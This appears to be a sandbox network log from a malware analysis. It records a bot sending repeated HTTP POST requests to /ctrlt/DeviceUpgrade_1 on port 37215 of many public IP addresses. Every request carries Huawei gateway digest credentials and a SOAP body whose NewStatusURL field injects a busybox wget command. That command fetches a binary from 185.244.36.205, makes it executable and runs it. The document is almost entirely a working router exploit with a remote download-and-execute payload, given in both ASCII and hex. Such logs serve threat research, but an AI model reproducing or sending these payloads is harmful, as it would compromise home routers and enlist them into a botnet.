                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1132192.168.2.1554674122.168.112.12637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931395054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1133192.168.2.155209045.201.240.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931395054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1134192.168.2.153515294.99.177.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931395054 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1135192.168.2.1534342186.146.113.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931417942 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1136192.168.2.155813237.226.63.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931423903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1137192.168.2.1539066122.34.240.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931432009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1138192.168.2.1545570102.119.171.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931452036 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1139192.168.2.1537526156.172.137.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931482077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1140192.168.2.1559238122.137.229.18137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931487083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1141192.168.2.153461041.252.59.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931504011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1142192.168.2.155157041.142.82.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.931539059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
